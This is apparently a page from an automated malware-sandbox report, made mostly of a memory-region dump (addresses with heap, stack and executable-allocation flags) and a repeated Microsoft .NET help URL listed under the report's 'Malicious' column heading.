page read and write
6CFC000
stack
page read and write
339D000
stack
page read and write
180D6D30000
trusted library allocation
page read and write
3200000
heap
page read and write
2C25000
heap
page read and write
722C000
stack
page read and write
22448E19000
heap
page read and write
7FF848E20000
trusted library allocation
page read and write
3101000
heap
page read and write
1C4F651A000
heap
page read and write
3612000
heap
page read and write
22448F0F000
heap
page read and write
4D2B000
stack
page read and write
22447000000
heap
page read and write
1CAD4435000
heap
page read and write
2E7A000
heap
page read and write
6D3B000
stack
page read and write
7FF848C7C000
trusted library allocation
page execute and read and write
1C4FB122000
trusted library allocation
page read and write
7FF848F00000
trusted library allocation
page read and write
34FE000
stack
page read and write
2722000
system
page execute and read and write
1C4FB200000
heap
page read and write
3301000
heap
page read and write
1CABC892000
trusted library allocation
page read and write
2C02000
heap
page read and write
22446D0F000
heap
page read and write
2E5F000
heap
page read and write
2C02000
heap
page read and write
3100000
heap
page read and write
A4F58FE000
unkown
page readonly
521B000
stack
page read and write
22446CD8000
heap
page read and write
7FF848BC4000
trusted library allocation
page read and write
2FF0000
heap
page read and write
3532AFE000
stack
page read and write
7FF848E50000
trusted library allocation
page read and write
51DE000
stack
page read and write
2C32000
heap
page read and write
1C4F6D10000
trusted library section
page readonly
799B000
stack
page read and write
74CE000
stack
page read and write
3301000
heap
page read and write
1CABC53A000
trusted library allocation
page read and write
305F000
heap
page read and write
22448BAA000
heap
page read and write
2FBE000
stack
page read and write
7FF848E70000
trusted library allocation
page read and write
2C2E000
heap
page read and write
30BC000
stack
page read and write
22446D05000
heap
page read and write
4BDE000
stack
page read and write
7FF848F60000
trusted library allocation
page read and write
1C4FB1F0000
trusted library allocation
page read and write
A4F647E000
unkown
page readonly
A4F53FC000
stack
page read and write
3532A73000
stack
page read and write
194D2960000
heap
page execute and read and write
49DBB3E000
stack
page read and write
72DE000
stack
page read and write
2EE0000
heap
page read and write
2E90000
heap
page read and write
7FF848EF0000
trusted library allocation
page read and write
531B000
stack
page read and write
2C43000
heap
page read and write
2C21000
heap
page read and write
49DBBBE000
stack
page read and write
A4F52FE000
unkown
page readonly
22448C4C000
heap
page read and write
3DE0000
unclassified section
page execute and read and write
3043000
heap
page read and write
1C4FB110000
trusted library allocation
page read and write
322E000
heap
page read and write
505D000
stack
page read and write
70FB000
stack
page read and write
3270000
heap
page read and write
22448C31000
heap
page read and write
1C4F6D50000
trusted library section
page readonly
180F0CE1000
heap
page read and write
526B000
stack
page read and write
2BB9000
stack
page read and write
6E01000
heap
page read and write
797E000
stack
page read and write
180D6EB0000
trusted library allocation
page read and write
324E000
stack
page read and write
35327EF000
stack
page read and write
2F01000
heap
page read and write
2C27000
heap
page read and write
7FF848C70000
trusted library allocation
page execute and read and write
180DA674000
trusted library allocation
page read and write
A4F4DF7000
stack
page read and write
2E2E000
heap
page read and write
A4F60FB000
stack
page read and write
B572FF000
stack
page read and write
180DA4E2000
trusted library allocation
page read and write
511B000
stack
page read and write
194D28AF000
heap
page read and write
180E8AA0000
trusted library allocation
page read and write
1C4FB2DE000
heap
page read and write
1CAD43F8000
heap
page read and write
4C6D000
stack
page read and write
7FF848E50000
trusted library allocation
page read and write
1CABA2DF000
heap
page read and write
2BB0000
heap
page read and write
194B8B50000
heap
page read and write
509B000
stack
page read and write
7FF848F53000
trusted library allocation
page read and write
7FF848EE0000
trusted library allocation
page read and write
7FF848D6A000
trusted library allocation
page read and write
30FE000
stack
page read and write
180DA739000
trusted library allocation
page read and write
9C18BFE000
stack
page read and write
A4F50FE000
unkown
page readonly
A4F6B7E000
stack
page read and write
1C4F6A40000
trusted library allocation
page read and write
7FF848D50000
trusted library allocation
page read and write
180D9B54000
trusted library allocation
page read and write
6401000
heap
page read and write
22448C78000
heap
page read and write
2E90000
heap
page read and write
B5737D000
stack
page read and write
22447005000
heap
page read and write
7FF848C0C000
trusted library allocation
page execute and read and write
326A000
stack
page read and write
2C27000
heap
page read and write
35B0000
heap
page read and write
505B000
stack
page read and write
1810000
unclassified section
page execute and read and write
2D01000
heap
page read and write
3287000
heap
page read and write
3532B7E000
stack
page read and write
6FC0000
trusted library allocation
page read and write
22448F0B000
heap
page read and write
7FF848DE0000
trusted library allocation
page read and write
318E000
stack
page read and write
3212000
heap
page read and write
3006000
heap
page read and write
3600000
heap
page read and write
B56FBE000
stack
page read and write
A4F4EFE000
unkown
page readonly
1CABA280000
heap
page read and write
A4F61FE000
unkown
page readonly
22446D06000
heap
page read and write
1CABC9F2000
trusted library allocation
page read and write
180D9154000
trusted library allocation
page read and write
2A70000
heap
page read and write
322F000
heap
page read and write
519E000
stack
page read and write
194BAC30000
trusted library allocation
page read and write
7FF848EF0000
trusted library allocation
page read and write
2DBE000
stack
page read and write
22448ECB000
heap
page read and write
22448B61000
heap
page read and write
2FD0000
heap
page read and write
180D6D70000
heap
page readonly
2C2F000
heap
page read and write
1C4FB120000
trusted library allocation
page read and write
3901000
heap
page read and write
757B000
stack
page read and write
B5747E000
stack
page read and write
1CABA293000
heap
page read and write
180D6F70000
heap
page read and write
194B89B0000
heap
page read and write
3301000
heap
page read and write
3012000
heap
page read and write
7FF848C76000
trusted library allocation
page read and write
2E3F000
heap
page read and write
1CABC4DE000
trusted library allocation
page read and write
22448EB6000
heap
page read and write
2E3F000
heap
page read and write
194B8A50000
trusted library allocation
page read and write
22448BAA000
heap
page read and write
1C4FB24E000
heap
page read and write
1560000
heap
page read and write
180D8E99000
trusted library allocation
page read and write
509E000
stack
page read and write
194D28C8000
heap
page read and write
A4F65F9000
stack
page read and write
194BABE4000
trusted library allocation
page read and write
4B2B000
stack
page read and write
3340000
heap
page read and write
3532C7D000
stack
page read and write
2E43000
heap
page read and write
2A32000
system
page execute and read and write
194B8AC0000
heap
page read and write
125C000
stack
page read and write
325F000
heap
page read and write
6401000
heap
page read and write
B578FB000
stack
page read and write
1CAD43F3000
heap
page read and write
180DA1B7000
trusted library allocation
page read and write
1CABA260000
heap
page read and write
72BE000
stack
page read and write
7FF848BCB000
trusted library allocation
page read and write
709E000
stack
page read and write
3200000
heap
page read and write
6C3E000
stack
page read and write
1426000
heap
page read and write
2E4F000
heap
page read and write
180F1050000
heap
page read and write
782B000
stack
page read and write
1410000
heap
page read and write
180F0C37000
heap
page execute and read and write
343E000
stack
page read and write
3580000
heap
page read and write
2E25000
heap
page read and write
2C2E000
heap
page read and write
1CAD44EE000
heap
page read and write
180DA1E0000
trusted library allocation
page read and write
3101000
heap
page read and write
2C2F000
heap
page read and write
7FF848DD0000
trusted library allocation
page read and write
7FF848DE0000
trusted library allocation
page read and write
B57678000
stack
page read and write
3127000
unclassified section
page execute and read and write
180E8D79000
trusted library allocation
page read and write
723F000
stack
page read and write
2D10000
heap
page read and write
3206000
heap
page read and write
2D80000
heap
page read and write
180F1060000
heap
page read and write
3600000
heap
page read and write
2E78000
heap
page read and write
2F3E000
stack
page read and write
3100000
heap
page read and write
1CAD442D000
heap
page read and write
180E9AA8000
trusted library allocation
page read and write
3002000
heap
page read and write
180D6EB2000
trusted library allocation
page read and write
471000
remote allocation
page execute and read and write
7FF848E00000
trusted library allocation
page read and write
2E79000
heap
page read and write
3A00000
heap
page read and write
2779000
stack
page read and write
723E000
stack
page read and write
180D8B11000
trusted library allocation
page read and write
1537000
unclassified section
page execute and read and write
194B8897000
heap
page read and write
22448B36000
heap
page read and write
7FF848EA0000
trusted library allocation
page read and write
322F000
heap
page read and write
180D8EA1000
trusted library allocation
page read and write
180D6FA0000
heap
page read and write
194B88EE000
heap
page read and write
2C21000
heap
page read and write
180F0C6E000
heap
page read and write
2E25000
heap
page read and write
7FF848C66000
trusted library allocation
page read and write
9C18AFE000
stack
page read and write
2D22000
system
page execute and read and write
194D288F000
heap
page read and write
2880000
system
page execute and read and write
34CE000
stack
page read and write
308E000
stack
page read and write
3243000
heap
page read and write
6600000
trusted library allocation
page read and write
22448CA0000
heap
page read and write
3301000
heap
page read and write
719E000
stack
page read and write
2E21000
heap
page read and write
4FDE000
stack
page read and write
7FF848BB4000
trusted library allocation
page read and write
180D6DBC000
heap
page read and write
2569000
stack
page read and write
2C22000
heap
page read and write
2B70000
heap
page read and write
7FF848D61000
trusted library allocation
page read and write
3402000
heap
page read and write
7FF848E00000
trusted library allocation
page read and write
3130000
heap
page read and write
194B88AF000
heap
page read and write
1C4F6D00000
trusted library section
page readonly
2C60000
heap
page read and write
525B000
unkown
page read and write
3600000
heap
page read and write
180D6DC5000
heap
page read and write
3180000
heap
page read and write
7FF848E20000
trusted library allocation
page read and write
736E000
stack
page read and write
22448EDB000
heap
page read and write
22448C68000
heap
page read and write
22448F1A000
heap
page read and write
1CABC439000
trusted library allocation
page read and write
180F0CE9000
heap
page read and write
22446CFA000
heap
page read and write
A4F51FC000
stack
page read and write
A4F5A7E000
stack
page read and write
2802000
heap
page read and write
22448D24000
heap
page read and write
2730000
heap
page read and write
559E000
stack
page read and write
3200000
heap
page read and write
7FF848DB0000
trusted library allocation
page read and write
3DC0000
unclassified section
page execute and read and write
4EAD000
stack
page read and write
1CAD4890000
heap
page read and write
49DB4FE000
stack
page read and write
733C000
stack
page read and write
738C000
stack
page read and write
1C4FB4C0000
remote allocation
page read and write
362E000
heap
page read and write
746E000
stack
page read and write
1C4F5C7B000
heap
page read and write
32F0000
heap
page read and write
3206000
heap
page read and write
1CABC3B0000
heap
page execute and read and write
31EE000
stack
page read and write
7FF848BBD000
trusted library allocation
page execute and read and write
1C4F5CB9000
heap
page read and write
329E000
stack
page read and write
2E12000
heap
page read and write
A4F56FE000
unkown
page readonly
2C79000
heap
page read and write
22446C00000
heap
page read and write
194B8890000
heap
page read and write
302E000
heap
page read and write
2E4F000
heap
page read and write
22448B30000
heap
page read and write
1CABA470000
heap
page read and write
3532FFF000
stack
page read and write
773F000
stack
page read and write
67FF000
stack
page read and write
28E0000
heap
page read and write
2C00000
heap
page read and write
54DE000
stack
page read and write
2E2E000
heap
page read and write
323E000
stack
page read and write
302E000
heap
page read and write
1C4F5C5A000
heap
page read and write
1C4F6400000
heap
page read and write
27B2000
system
page execute and read and write
2B20000
heap
page read and write
6B3E000
stack
page read and write
2A30000
system
page execute and read and write
7FF848E10000
trusted library allocation
page read and write
22448EC4000
heap
page read and write
7FF848DD0000
trusted library allocation
page read and write
30FE000
stack
page read and write
180DA1CF000
trusted library allocation
page read and write
180F0A90000
heap
page read and write
180D6C90000
heap
page read and write
2790000
heap
page read and write
2D30000
heap
page read and write
4ADE000
stack
page read and write
22448B7A000
heap
page read and write
A4F5FFE000
unkown
page readonly
6801000
heap
page read and write
194BA83B000
trusted library allocation
page read and write
747E000
stack
page read and write
194BA7E2000
trusted library allocation
page read and write
22446E10000
heap
page read and write
7FF848EB0000
trusted library allocation
page read and write
764C000
stack
page read and write
180F0DD0000
heap
page read and write
22446C55000
heap
page read and write
27E0000
heap
page read and write
22448C49000
heap
page read and write
1C4F5C7D000
heap
page read and write
3228000
heap
page read and write
7FF848BC0000
trusted library allocation
page read and write
29C0000
system
page execute and read and write
180D6EF0000
trusted library allocation
page read and write
559E000
stack
page read and write
521E000
stack
page read and write
194BA6E1000
trusted library allocation
page read and write
1C4FB270000
trusted library allocation
page read and write
1CABC4EA000
trusted library allocation
page read and write
22446D08000
heap
page read and write
22446CFC000
heap
page read and write
2C26000
heap
page read and write
194B8990000
heap
page read and write
569E000
stack
page read and write
1C4F5CA7000
heap
page read and write
6801000
heap
page read and write
4EAE000
stack
page read and write
71FD000
stack
page read and write
1CACC401000
trusted library allocation
page read and write
194B8B55000
heap
page read and write
2C2E000
heap
page read and write
2E80000
system
page execute and read and write
3C9E000
stack
page read and write
1C4F5D29000
heap
page read and write
180D6F20000
heap
page execute and read and write
1C4F6502000
heap
page read and write
22448B66000
heap
page read and write
1CABC3E0000
heap
page read and write
49DB473000
stack
page read and write
3612000
heap
page read and write
194D29E0000
heap
page execute and read and write
7FF848C96000
trusted library allocation
page execute and read and write
74DB000
stack
page read and write
22448BAA000
heap
page read and write
2E66000
heap
page read and write
1C4FB31B000
heap
page read and write
2C5F000
heap
page read and write
7FF848E90000
trusted library allocation
page read and write
304E000
stack
page read and write
6601000
heap
page read and write
22448B41000
heap
page read and write
6EC0000
trusted library allocation
page read and write
3206000
heap
page read and write
7FF848EB0000
trusted library allocation
page read and write
4E6B000
unkown
page read and write
3222000
heap
page read and write
2989000
stack
page read and write
35FD000
stack
page read and write
1CAD44C7000
heap
page read and write
3261000
heap
page read and write
73BC000
stack
page read and write
180D8A91000
trusted library allocation
page read and write
1C4F5B70000
heap
page read and write
2C25000
heap
page read and write
180D6D60000
heap
page read and write
575D000
stack
page read and write
3DC7000
unclassified section
page execute and read and write
2E32000
heap
page read and write
33D0000
heap
page read and write
A4F5F7E000
stack
page read and write
3532D7E000
stack
page read and write
313E000
stack
page read and write
753F000
stack
page read and write
3A12000
heap
page read and write
6740000
trusted library allocation
page read and write
1C4FB30A000
heap
page read and write
7FF848C66000
trusted library allocation
page read and write
4D6B000
stack
page read and write
7FF848BB2000
trusted library allocation
page read and write
3301000
heap
page read and write
180D6DDF000
heap
page read and write
4FDE000
stack
page read and write
1420000
heap
page read and write
22446CD8000
heap
page read and write
180F10C6000
heap
page read and write
180F0C7A000
heap
page read and write
22448C98000
heap
page read and write
3701000
heap
page read and write
3190000
heap
page read and write
2BBD000
stack
page read and write
1CABA230000
heap
page read and write
2E00000
heap
page read and write
7FF848D62000
trusted library allocation
page read and write
7FF848DF0000
trusted library allocation
page read and write
3000000
heap
page read and write
194BA7FF000
trusted library allocation
page read and write
2C3F000
heap
page read and write
194D2D70000
heap
page read and write
22448F1A000
heap
page read and write
7FF848E30000
trusted library allocation
page read and write
194BA747000
trusted library allocation
page read and write
194BAB87000
trusted library allocation
page read and write
7FF848C6C000
trusted library allocation
page execute and read and write
2F80000
heap
page read and write
180D8E8F000
trusted library allocation
page read and write
194BA7F9000
trusted library allocation
page read and write
7FF848ED0000
trusted library allocation
page read and write
2E43000
heap
page read and write
194D2A10000
heap
page read and write
3227000
heap
page read and write
1C4FB300000
heap
page read and write
4FAD000
stack
page read and write
22448EB9000
heap
page read and write
3243000
heap
page read and write
194BA7F6000
trusted library allocation
page read and write
22448B32000
heap
page read and write
7FF848DC0000
trusted library allocation
page read and write
2BA0000
heap
page read and write
7FF848EE0000
trusted library allocation
page read and write
2D60000
heap
page read and write
2C25000
heap
page read and write
2C00000
heap
page read and write
4F9B000
stack
page read and write
22448C51000
heap
page read and write
1C4F5D13000
heap
page read and write
B574FE000
stack
page read and write
180F1086000
heap
page read and write
796E000
stack
page read and write
3120000
unclassified section
page execute and read and write
1C4FB164000
trusted library allocation
page read and write
22446C5F000
heap
page read and write
3670000
heap
page read and write
506E000
stack
page read and write
1C4FB400000
trusted library allocation
page read and write
1CACC3F1000
trusted library allocation
page read and write
2E43000
heap
page read and write
4F0E000
stack
page read and write
515C000
stack
page read and write
4E9E000
stack
page read and write
2E79000
stack
page read and write
2C7F000
heap
page read and write
1C4F5CA1000
heap
page read and write
2D20000
system
page execute and read and write
7FF848F00000
trusted library allocation
page read and write
1C4F5C79000
heap
page read and write
2C12000
heap
page read and write
2EFE000
stack
page read and write
27F9000
stack
page read and write
2C89000
stack
page read and write
584C000
stack
page read and write
7FF848CA6000
trusted library allocation
page execute and read and write
1C4F6402000
heap
page read and write
2C00000
heap
page read and write
180E90A8000
trusted library allocation
page read and write
49DBA39000
stack
page read and write
7FF848D70000
trusted library allocation
page execute and read and write
180F0C40000
heap
page read and write
49DBABF000
stack
page read and write
22448EC4000
heap
page read and write
3310000
heap
page read and write
49DB879000
stack
page read and write
6201000
heap
page read and write
3221000
heap
page read and write
2C50000
heap
page read and write
A4F4FFE000
stack
page read and write
32E0000
system
page execute and read and write
4CDD000
stack
page read and write
1C4F651A000
heap
page read and write
2D01000
heap
page read and write
1CABC4FB000
trusted library allocation
page read and write
22448B61000
heap
page read and write
1C4F5C13000
heap
page read and write
180DA1BC000
trusted library allocation
page read and write
3C37000
unclassified section
page execute and read and write
3B00000
heap
page read and write
26E9000
stack
page read and write
3627000
heap
page read and write
2F01000
heap
page read and write
763C000
stack
page read and write
1C4F70A0000
trusted library allocation
page read and write
50DE000
stack
page read and write
3701000
heap
page read and write
2A10000
heap
page read and write
A4F5E7E000
stack
page read and write
3612000
heap
page read and write
B5787E000
stack
page read and write
353317E000
stack
page read and write
7FF848BB4000
trusted library allocation
page read and write
A4F57FB000
stack
page read and write
22448B81000
heap
page read and write
1CABA350000
heap
page read and write
180DA3B8000
trusted library allocation
page read and write
2D70000
heap
page read and write
194D2AF0000
heap
page read and write
180D9E3F000
trusted library allocation
page read and write
303E000
stack
page read and write
180F0C78000
heap
page read and write
2BAE000
stack
page read and write
3206000
heap
page read and write
2E25000
heap
page read and write
73DE000
stack
page read and write
65CE000
stack
page read and write
6940000
trusted library allocation
page read and write
3560000
heap
page read and write
2A39000
stack
page read and write
2BE0000
heap
page read and write
2E60000
heap
page read and write
7FF848D60000
trusted library allocation
page read and write
1CABC4E4000
trusted library allocation
page read and write
1C4F5CFF000
heap
page read and write
365F000
heap
page read and write
2E00000
heap
page read and write
2A90000
heap
page read and write
2C12000
heap
page read and write
1C4F651A000
heap
page read and write
2C77000
heap
page read and write
1C4FB120000
trusted library allocation
page read and write
4F6E000
stack
page read and write
2E27000
heap
page read and write
22448D24000
heap
page read and write
180D6DCB000
heap
page read and write
2EF0000
heap
page read and write
A4F5EFE000
unkown
page readonly
7FF848D7A000
trusted library allocation
page read and write
549E000
stack
page read and write
3000000
heap
page read and write
1C4F5C8F000
heap
page read and write
303E000
stack
page read and write
7FF848DE0000
trusted library allocation
page read and write
3212000
heap
page read and write
3271000
heap
page read and write
3400000
heap
page read and write
2E40000
heap
page read and write
34FF000
stack
page read and write
22448BA8000
heap
page read and write
7FF848DA0000
trusted library allocation
page execute and read and write
22448B39000
heap
page read and write
7FF848E30000
trusted library allocation
page read and write
194B88DA000
heap
page read and write
3532EFE000
stack
page read and write
2E5F000
heap
page read and write
2C2E000
heap
page read and write
17B7000
unclassified section
page execute and read and write
50DE000
stack
page read and write
1CABA37E000
heap
page read and write
180DA73E000
trusted library allocation
page read and write
3225000
heap
page read and write
180D8FB5000
trusted library allocation
page read and write
7C3C000
stack
page read and write
3606000
heap
page read and write
67CE000
stack
page read and write
22446DF0000
heap
page read and write
7FF848C70000
trusted library allocation
page execute and read and write
7FF848DC0000
trusted library allocation
page read and write
3D9F000
stack
page read and write
6201000
heap
page read and write
7FF848F5B000
trusted library allocation
page read and write
541B000
stack
page read and write
2E2E000
heap
page read and write
3B20000
heap
page read and write
1C4F6415000
heap
page read and write
2E4F000
heap
page read and write
22448B86000
heap
page read and write
22446D10000
heap
page read and write
522B000
stack
page read and write
3101000
heap
page read and write
1C4FB284000
heap
page read and write
180D6FA4000
heap
page read and write
2750000
heap
page read and write
22448B39000
heap
page read and write
49DBC3E000
stack
page read and write
7FF848DA0000
trusted library allocation
page execute and read and write
51DE000
stack
page read and write
3002000
heap
page read and write
7FF848D80000
trusted library allocation
page execute and read and write
180D6CB0000
heap
page read and write
6EFD000
stack
page read and write
3532DFF000
stack
page read and write
63CE000
stack
page read and write
194BAF6E000
trusted library allocation
page read and write
22448C38000
heap
page read and write
6801000
heap
page read and write
323F000
heap
page read and write
1CAD43F0000
heap
page read and write
1C4F5B60000
heap
page read and write
194D2B01000
heap
page read and write
714C000
stack
page read and write
7FF848ED0000
trusted library allocation
page read and write
3500000
heap
page read and write
732C000
stack
page read and write
2D00000
system
page execute and read and write
194BA6FB000
trusted library allocation
page read and write
3C57000
unclassified section
page execute and read and write
362E000
heap
page read and write
2B20000
heap
page read and write
A4F4CFE000
unkown
page readonly
1C4FB150000
trusted library allocation
page read and write
22448D26000
heap
page read and write
3025000
heap
page read and write
22446C27000
heap
page read and write
22448B35000
heap
page read and write
22446CFB000
heap
page read and write
180D6D80000
heap
page read and write
363F000
heap
page read and write
1C4F63C1000
trusted library allocation
page read and write
33CE000
stack
page read and write
1C4F6791000
trusted library allocation
page read and write
2D30000
heap
page read and write
7340000
trusted library allocation
page read and write
1CABA343000
heap
page read and write
39D0000
heap
page read and write
3800000
heap
page read and write
787F000
stack
page read and write
6400000
trusted library allocation
page read and write
3B10000
heap
page read and write
194D27F0000
heap
page read and write
718E000
stack
page read and write
26A9000
stack
page read and write
22448CA7000
heap
page read and write
28B0000
heap
page read and write
33C0000
heap
page read and write
63EE000
stack
page read and write
1CABA30B000
heap
page read and write
7FF848D6A000
trusted library allocation
page read and write
743F000
stack
page read and write
7FF848D92000
trusted library allocation
page read and write
A4F6E7E000
stack
page read and write
2E80000
heap
page read and write
22448D24000
heap
page read and write
1C4FB241000
heap
page read and write
1CABA4B0000
trusted library allocation
page read and write
2DE0000
heap
page read and write
22446C20000
heap
page read and write
4FCE000
stack
page read and write
1C4FB2BE000
heap
page read and write
35CE000
stack
page read and write
3606000
heap
page read and write
49DB5FF000
stack
page read and write
1C4FB0A0000
trusted library allocation
page read and write
2C5F000
heap
page read and write
2C12000
heap
page read and write
1C4F5CB3000
heap
page read and write
1CABA2C1000
heap
page read and write
3720000
heap
page read and write
2C3F000
heap
page read and write
B582CE000
stack
page read and write
3232000
heap
page read and write
7FF848E70000
trusted library allocation
page read and write
1C4FB317000
heap
page read and write
325F000
heap
page read and write
3212000
heap
page read and write
194D28B3000
heap
page read and write
194CA6E1000
trusted library allocation
page read and write
194B89F0000
heap
page read and write
2FC0000
heap
page read and write
22448C58000
heap
page read and write
3643000
heap
page read and write
3412000
heap
page read and write
A4F5BFE000
unkown
page readonly
1C4F6D20000
trusted library section
page readonly
180F10D0000
heap
page read and write
2E27000
heap
page read and write
1CABA307000
heap
page read and write
180D6D89000
heap
page read and write
703E000
stack
page read and write
1C4FB470000
trusted library allocation
page read and write
7FF848DF0000
trusted library allocation
page read and write
22446CFF000
heap
page read and write
22448B32000
heap
page read and write
7FF848E40000
trusted library allocation
page read and write
7FF848EC0000
trusted library allocation
page read and write
377F000
stack
page read and write
2E3F000
heap
page read and write
22448D24000
heap
page read and write
1C4FB150000
trusted library allocation
page read and write
2D90000
heap
page read and write
3812000
heap
page read and write
7FF848BCD000
trusted library allocation
page execute and read and write
180D8EC9000
trusted library allocation
page read and write
3406000
heap
page read and write
49DB67D000
stack
page read and write
2E3E000
stack
page read and write
2882000
system
page execute and read and write
25E2000
system
page execute and read and write
33F0000
heap
page read and write
1CABC434000
trusted library allocation
page read and write
7FF848D80000
trusted library allocation
page execute and read and write
2C21000
heap
page read and write
22448B9D000
heap
page read and write
7FF848BC2000
trusted library allocation
page read and write
4DAB000
stack
page read and write
343F000
stack
page read and write
A4F4BFD000
stack
page read and write
180D8EC5000
trusted library allocation
page read and write
2E00000
heap
page read and write
1512000
unclassified section
page execute and read and write
50CE000
stack
page read and write
180F10BA000
heap
page read and write
32E2000
system
page execute and read and write
3625000
heap
page read and write
9C18705000
stack
page read and write
2C3F000
heap
page read and write
35AE000
stack
page read and write
180D6DC9000
heap
page read and write
2DFE000
stack
page read and write
22448B71000
heap
page read and write
180E8A91000
trusted library allocation
page read and write
2AD0000
heap
page read and write
6AFE000
stack
page read and write
25E0000
system
page execute and read and write
2A02000
heap
page read and write
A4F5AFE000
unkown
page readonly
6980000
trusted library allocation
page read and write
1C4F650C000
heap
page read and write
B5777E000
stack
page read and write
2A62000
system
page execute and read and write
3240000
heap
page read and write
49DB77E000
stack
page read and write
A4F55FB000
stack
page read and write
2C4F000
heap
page read and write
1C4F5D02000
heap
page read and write
2C80000
heap
page read and write
7FF848E70000
trusted library allocation
page read and write
22448ECE000
heap
page read and write
31B0000
heap
page read and write
1C4F5B40000
heap
page read and write
2E2E000
heap
page read and write
B583CD000
stack
page read and write
1CABC44D000
trusted library allocation
page read and write
565E000
stack
page read and write
1C4FB100000
trusted library allocation
page read and write
22448F30000
heap
page read and write
3006000
heap
page read and write
35331FB000
stack
page read and write
2839000
stack
page read and write
7FF848D92000
trusted library allocation
page read and write
194BA6D0000
heap
page execute and read and write
1C4F6C20000
trusted library allocation
page read and write
194B88D6000
heap
page read and write
A4F68FE000
unkown
page readonly
3000000
heap
page read and write
22446D07000
heap
page read and write
774C000
stack
page read and write
22448C78000
heap
page read and write
2780000
heap
page read and write
787E000
stack
page read and write
2E32000
system
page execute and read and write
There are 1360 hidden memdumps, click here to show them.

DOM / HTML

URL
Malicious
https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0